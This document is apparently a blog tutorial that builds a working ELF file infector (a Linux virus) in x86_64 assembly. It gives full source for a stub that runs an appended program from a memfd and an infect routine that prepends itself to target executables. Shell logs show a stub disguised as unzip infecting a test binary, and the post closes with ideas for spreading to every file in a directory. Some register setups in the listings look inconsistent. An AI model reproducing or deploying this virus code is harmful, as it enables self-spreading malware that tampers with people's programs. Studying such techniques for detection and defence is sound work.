Introduction

There are many approaches to ELF file infection, some better than others. The worst way to fail is to break the program being infected so that it no longer functions properly. The techniques that are easy to find on the internet have numerous flaws that can make it difficult to infect a program without destroying it. If one appends a new section or an ELF program header, there is always a nonzero chance that the ELF file is structured in a peculiar way, or depends on file offsets in such a manner that it ceases to work correctly (an entry must be inserted into the ELF program header or section table, so the rest of the file must be moved to make room for it). Other infectors choose to wrap the original program and call it at runtime, but I am not particularly fond of their implementations either: they often rely on temporary files, which clobber argv[0] (and more), disrupt the passing of argv and envp, and lean heavily on libc, which drastically increases the file size.

The logical choice, then, is to finally provide an educational resource on an ELF infector that is (largely) foolproof.

The game plan

I would like to create a program (ideally in x86_64 assembly language, assembled with FASM for a small size out of the box) to which an ELF file can be appended, and which executes that file when run. In general, if the path to an ELF file is known, it can easily be executed while preserving the values of argc, argv, and envp:

format ELF64 executable
use64

sys_execve equ 59

entry _start

stuff: db "/usr/bin/sh", 0
_start:
    ; Load the path to the executable
    mov rdi, stuff
    ; Prepare to call execve
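    ; Load argv (argc sits at [rsp], the argv pointers start at [rsp + 8])
    lea rsi, [rsp + 8]
    ; Load envp: skip argc, the argc argv pointers and argv's NULL terminator
    mov rdx, [rsp]
    lea rdx, [rsp+8 + rdx*8 + 8]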
    ; Perform the syscall
    mov rax, sys_execve
    syscall
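
The address arithmetic in the listing above follows the initial stack layout of a Linux x86_64 process: argc at [rsp], then the argv pointers, a NULL terminator, and then the environment pointers. As a minimal sketch (the function name `entry_stack_offsets` is hypothetical and not part of the stub), the same offsets can be computed like this:

```python
def entry_stack_offsets(argc: int, word: int = 8) -> dict:
    """Byte offsets from rsp at process entry, assuming the usual
    x86_64 Linux layout: argc, argv[0..argc-1], NULL, envp[0..], NULL."""
    argv_off = word                            # argv[0] follows argc
    envp_off = argv_off + argc * word + word   # skip argv[] and its NULL
    return {"argc": 0, "argv": argv_off, "envp": envp_off}
```

With argc = 1, the environment pointers start 24 bytes above rsp, which is what `lea rdx, [rsp+8 + rdx*8 + 8]` evaluates to.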

Clearly, I could take an additional step and sketch a traditional “bad” ELF infector that extracts an ELF file attached to it and executes it. However, I will skip this step as it is a waste of time. Instead, I will utilize memfd_create to create a memory-backed file descriptor, insert the ELF file contents into it using sendfile, and pass "/proc/self/fd/..." as an argument to execve.

An implementation

Let’s start with our previous “skeleton” and expand upon it.

format ELF64 executable
use64

; XXX: You have to set this to the resulting ELF file size manually.
SIZE equ ??

sys_execve equ 59
sys_open equ 2
sys_lseek equ 8
sys_memfd_create equ 319
sys_sendfile equ 40
sys_close equ 3

entry _start

memfd_path: db "/proc/self/fd/", 0, 0

self: db '/proc/self/exe', 0
empty: db 0
size: dq SIZE

load_elf:
    sub rsp, 8
    ; Open ourselves.
    xor esi, esi
    mov edi, self
    mov rax, sys_open
    syscall
    ; Obtain the length: seek to back.
    mov r8, rax
    mov rdi, r8
    mov rax, sys_lseek
    syscall
    ; Ok, now rewind the file to the beginning.
    mov r10, rax
    mov rdx, rsi
    mov rax, r9
    syscall
    ; Call memfd_create, call with MFD_CLOEXEC.
    mov edi, empty
    mov esi, 1
    mov rax, sys_memfd_create
    syscall
    ; Copy the file contents to the memfd using sendfile.
    mov edx, size
    mov r9, rax
    mov rdi, rax
    mov rsi, r8
    sub r10d, SIZE
    mov rax, sys_sendfile
    syscall
    ; Close the file descriptor we hold to our own binary.
    mov eax, sys_close
    mov rdi, r8
    syscall
    ; Bravely assume that the memfd descriptor number is a single digit.
    ; This might not always hold, but improving upon it is beyond the
    ; scope of this post.
    add r9d, 48
    mov BYTE [memfd_path + 14], r9b
    mov BYTE [memfd_path + 15], 0
    add rsp, 8
    ret

_start:
    ; Load the executable to a memfd.
    call load_elf
    ; Load the path to the executable
    mov rdi, memfd_path
    ; Prepare to call execve
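    ; Load argv (argc sits at [rsp], the argv pointers start at [rsp + 8])
    lea rsi, [rsp + 8]
    ; Load envp: skip argc, the argc argv pointers and argv's NULL terminator
    mov rdx, [rsp]
    lea rdx, [rsp+8 + rdx*8 + 8]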
    ; Perform the syscall
    mov rax, sys_execve
    syscall

I have confirmed that my code works as intended:

 0 ~/workspace % fasm stub.asm
flat assembler  version 1.73.30  (16384 kilobytes memory)
2 passes, 323 bytes.
 0 ~/workspace % cat /usr/bin/sh >> stub
 0 ~/workspace % export A=5
 0 ~/workspace % ./stub
$ echo $A
5
$ exit 4
 4 ~/workspace % ./stub -invalid
./stub: 0: Illegal option -d
 2 ~/workspace %
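
The file produced by `cat /usr/bin/sh >> stub` is simply the assembled stub followed by the original program, which is why the listing needs SIZE to know where the appended ELF begins. As a rough sketch of that layout (the helper name `split_appended` is hypothetical, and the stub size is assumed to be known), the two parts can be separated again like this:

```python
def split_appended(blob: bytes, stub_size: int):
    """Split a stub+program file into its two parts.

    Assumes the first `stub_size` bytes are the stub and everything
    after them is the original, unmodified program."""
    if stub_size > len(blob):
        raise ValueError("file is shorter than the stub size")
    return blob[:stub_size], blob[stub_size:]
```

The same split is what a cleanup tool would use to recover the original program from such a file.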

x86_64 assembly code golf

It is somewhat disturbing that a program this simple requires more than 320 bytes of machine code, so I will put forth some effort to make it smaller. I will utilize a few cheap tricks I have learned over the years, but I believe that explaining them falls outside the scope of this particular post (please stay tuned!). Ultimately, the size of the file was reduced to approximately 267 bytes. I have also added a payload stub call that will be useful in the future.

format ELF64 executable
use64

; XXX: You have to set this to the resulting ELF file size manually.
SIZE equ ??

sys_execve equ 59
sys_open equ 2
sys_lseek equ 8
sys_memfd_create equ 319
sys_sendfile equ 40
sys_write equ 1
sys_close equ 3

entry _start

memfd_path: db '/proc/self/fd/',0,0
self: db '/proc/self/exe'
empty: db 0
size: dq SIZE

load_elf:
    ; Open ourselves.
    xor esi, esi
    mov edi, self
    push sys_open
    pop rax
    syscall
    ; Obtain the length: seek to back.
    mov r8, rax
    mov rdi, r8
    push sys_lseek
    pop rax
    syscall
    ; Call memfd_create, call with MFD_CLOEXEC.
    mov edi, empty
    push 1
    pop rsi
    push sys_memfd_create
    pop rax
    syscall
    ; Copy the file contents to the memfd using sendfile.
    mov edx, size
    mov r9, rax
    mov rdi, rax
    mov rsi, r8
    sub r10d, SIZE
    push sys_sendfile
    pop rax
    syscall
    ; Close the file descriptor we hold to our own binary.
    push sys_close
    pop rax
    mov rdi, r8
    syscall
    ; Bravely assume that the memfd descriptor number is a single digit.
    ; This might not always hold, but improving upon it is beyond the
    ; scope of this post.
    add r9d, 48
    mov BYTE [memfd_path + 14], r9b
    ret

payload:
    ; Generally speaking, the payload code goes here.
    ret

_start:
    ; Run the virus code.
    call payload
    ; Load the executable to a memfd.
    call load_elf
    ; Load the path to the executable
    mov rdi, memfd_path
    ; Prepare to call execve
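    ; Load argv (argc sits at [rsp], the argv pointers start at [rsp + 8])
    lea rsi, [rsp + 8]
    ; Load envp: skip argc, the argc argv pointers and argv's NULL terminator
    mov rdx, [rsp]
    lea rdx, [rsp+8 + rdx*8 + 8]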
    ; Perform the syscall
    push sys_execve
    pop rax
    syscall

Infecting files

Simply put, you are meant to place “your own” code inside the payload function of the stub, but for completeness, I will illustrate one way of infecting an executable file from within the payload function. It has a few issues: it may reinfect files, its ELF file detection is weak, and it always infects a single, hard-coded file. However, it is a good starting point for further experiments.

; Infect a file. Take the name in `rdi`.
infect:
    ; Reserve some space on the stack for the buffer.
    sub rsp, 944
    ; Open `rdi`.
    push sys_open
    pop rbx
    mov rsi, rbx
    mov rax, rbx
    syscall
    ; Read the ELF header.
    mov r9d, eax
    lea rsi, [rsp - 128]
    ; Read 64 bytes.
    push 64
    pop rdx
    mov rdi, r9
    ; Notice: we're using `rax` as the syscall number here.
    ; 0 is the syscall number for `read`, hence I did not define it
    ; to save a few bytes.
    xor eax, eax
    syscall
    ; Verify the file header.
    movq xmm0, qword [rsi]
    movd eax, xmm0
    ; 0x7F and the magic 0x464C45 ("ELF").
    cmp eax, 0x464C457F
    jne .no_infect
    ; Check the number of sections. Our dropper/stub
    ; has no sections, so we will assume that the file
    ; with no sections has been infected already.
    ; There are better ways, but they require more
    ; implementation effort.
    cmp word [rsp - 68], 0
    je .no_infect
    ; Open the current executable.
    ; RBX is still sys_open.
    mov rdi, self
    xor esi, esi
    mov rax, rbx
    syscall
    ; Open a memfd. 
    mov r10d, eax
    mov rdi, empty
    push sys_memfd_create
    pop rax
    mov rsi, r8
    syscall
    ; Copy the infection stub to the memfd.
    mov ebx, eax
    ; Buffer. Read the infection stub here and write it to the memfd.
    lea r15, [rsp - 64]
    ; Read SIZE bytes from ourselves.
    mov edx, SIZE
    mov rdi, r10
    mov rsi, r15
    xor eax, eax
    syscall
    ; Write them to the memfd: this is the ELF stub.
    mov edx, SIZE
    mov rdi, rbx
    mov rax, r8
    syscall
    ; Seek to the beginning of the goat file.
    ; We have read the ELF headers, but we need them back.
    push sys_lseek
    pop r14
    mov rdi, r9
    xor esi, esi
    xor edx, edx
    mov rax, r14
    syscall
    ; Copy the goat file to the memfd in SIZE-big chunks.
.copygoat:
    ; Read SIZE bytes from the goat file.
    mov edx, SIZE
    mov rdi, r9
    mov rsi, r15
    xor eax, eax
    syscall
    ; Check if we have read more than 0 bytes.
    mov rdi, rbx
    test rax, rax
    jle .copygoat_end
    ; Write the data to the memfd now.
    mov rsi, r15
    mov rdx, rax
    mov rax, r8
    syscall
    ; Loop.
    jmp .copygoat
.copygoat_end:
    ; Seek to the beginning of the memfd and the goat file.
    xor esi, esi
    xor edx, edx
    mov rax, r14
    syscall
    mov rdi, r9
    mov rax, r14
    syscall
    ; Load the buffer again.
    lea rsi, [rsp - 64]
.copymemfd:
    ; Read SIZE bytes from the memfd file.
    mov edx, SIZE
    mov rdi, rbx
    xor eax, eax
    syscall
    ; Check if we have read more than 0 bytes.
    test rax, rax
    jle .copymemfd_end
    ; Write the data to the goat file.
    mov rdi, r9
    mov rdx, rax
    mov rax, r8
    syscall
    jmp .copymemfd
.copymemfd_end:
    ; Close all the file descriptors.
    ; RAX gets trashed so we need to save the syscall# elsewhere.
    push sys_close
    pop rdx
    mov rdi, rbx
    mov rax, rdx
    syscall
    mov rdi, r9
    mov rax, rdx
    syscall
    mov rdi, r10
    mov rax, rdx
    syscall
.no_infect:
    add rsp, 944
    ret

; Name of the file we want to infect.
inf: db "goat", 0
msg: db 'This file is infected.', 10, 0
payload:
    ; Print the "This file is infected." message.
    mov rsi, msg
    push sys_write
    pop r8
    mov rdx, 23
    mov rdi, r8
    mov rax, r8
    syscall
    ; Infect the file.
    mov rdi, inf
    jmp infect
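
The header check in the listing above compares the first four bytes against the ELF magic and then looks at the 16-bit section count, which sits at offset 60 of an ELF64 header (the `[rsp - 68]` operand, given a buffer at `[rsp - 128]`). As a minimal sketch of the same check, assuming a little-endian ELF64 file (the function name `elf64_section_count` is hypothetical):

```python
import struct

ELF_MAGIC = b"\x7fELF"
E_SHNUM_OFFSET = 60  # offset of e_shnum in an ELF64 header

def elf64_section_count(header: bytes):
    """Return e_shnum from a 64-byte ELF64 header, or None if the
    buffer is too short or does not start with the ELF magic."""
    if len(header) < 64 or header[:4] != ELF_MAGIC:
        return None
    (e_shnum,) = struct.unpack_from("<H", header, E_SHNUM_OFFSET)
    return e_shnum
```

A result of 0 is what the listing treats as "already infected". The same test is a cheap heuristic for spotting such files, although legitimately stripped binaries can also report zero sections.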

Conclusion

The program I have presented is not particularly stealthy or advanced at present, but I believe that it serves as a good example of a technique for infecting ELF files. Some potential enhancements to consider include:

  • Listing the files in the current directory and infecting all of them.
  • Modifying an unused ELF header field to indicate that the file has been infected, rather than relying on the fact that the stub has no sections.
  • Making further improvements to the code size.
  • Compressing the stub once the payload becomes large enough.

Finally, the following shell log demonstrates the capabilities of the program:

 ~/workspace % fasm stub.asm
flat assembler  version 1.73.30  (16384 kilobytes memory)
3 passes, 623 bytes.
 ~/workspace % # Pretend to be unzip:
 ~/workspace % cat /usr/bin/unzip >> stub
 ~/workspace % echo "int main(){}" > goat.c
 ~/workspace % gcc goat.c -o goat
 ~/workspace % ./goat
 ~/workspace % ./stub
This file is infected.
UnZip 6.00 of 20 April 2009, by Debian. Original by Info-ZIP.

Usage: unzip [-Z] [-opts[modifiers]] file[.zip] [list] [-x xlist] [-d exdir]
  Default action is to extract files in list, except those in xlist, to exdir;
  file[.zip] may be a wildcard.  -Z => ZipInfo mode ("unzip -Z" for usage).

  -p  extract files to pipe, no messages     -l  list files (short format)
  -f  freshen existing files, create none    -t  test compressed archive data
  -u  update files, create if necessary      -z  display archive comment only
  -v  list verbosely/show version info       -T  timestamp archive to latest
  -x  exclude files that follow (in xlist)   -d  extract files into exdir
modifiers:
  -n  never overwrite existing files         -q  quiet mode (-qq => quieter)
  -o  overwrite files WITHOUT prompting      -a  auto-convert any text files
  -j  junk paths (do not make directories)   -aa treat ALL files as text
  -U  use escapes for all non-ASCII Unicode  -UU ignore any Unicode fields
  -C  match filenames case-insensitively     -L  make (some) names lowercase
  -X  restore UID/GID info                   -V  retain VMS version numbers
  -K  keep setuid/setgid/tacky permissions   -M  pipe through "more" pager
See "unzip -hh" or unzip.txt for more help.  Examples:
  unzip data1 -x joe   => extract all files except joe from zipfile data1.zip
  unzip -p foo | more  => send contents of foo.zip via pipe into program more
  unzip -fo foo ReadMe => quietly replace existing ReadMe if archive file newer
 ~/workspace % ./goat
This file is infected.
 ~/workspace %